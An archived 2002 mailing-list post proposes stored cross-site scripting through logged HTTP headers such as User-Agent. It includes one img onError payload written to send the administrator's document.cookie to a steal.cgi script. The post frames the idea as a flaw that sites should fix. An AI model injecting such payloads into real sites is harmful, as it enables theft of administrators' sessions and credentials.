Vulnerability Development mailing list archives
XSS And Headers...
From: "lok lok" <itslok () hotmail com>
Date: Sat, 25 May 2002 14:01:10 +1000
There used to be alot of discussion about XSS, cross-site scripting where you can insert html into pages that are viewed by many ppl and steal info...
most of these sites (e.g. a bulletin board) have been updated to protect this behaviour...
however, i've noticed that many do not cover headers.. e.g.HTTP_USER_AGENT may be logged or stored somewhere when you sign-up to website "abc". The administrator, or whoever will check over your account and see your browser type...
normally it would contain something like... Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.0.3705)
..but with a proxy prog (i use proxomitron) you can change it to whatever you like..
for example: <img src="x.jpg" onError="this.src='steal.cgi?document.cookie';">
and if the site logs it, you just got the administrators password:)Now, im yet to come across any sites that this works on because i just thought of it this afternoon but let me know if it works:) in any case, a lot of sites would log/store this kind of information so it should be fixed.
_________________________________________________________________MSN Photos is the easiest way to share and print your photos: http://photos.msn.com/support/worldwide.aspx
Current thread:
- XSS And Headers... lok lok (May 25)
- Re: XSS And Headers... Roland Postle (May 26)
- Re: XSS And Headers... zeno (May 26)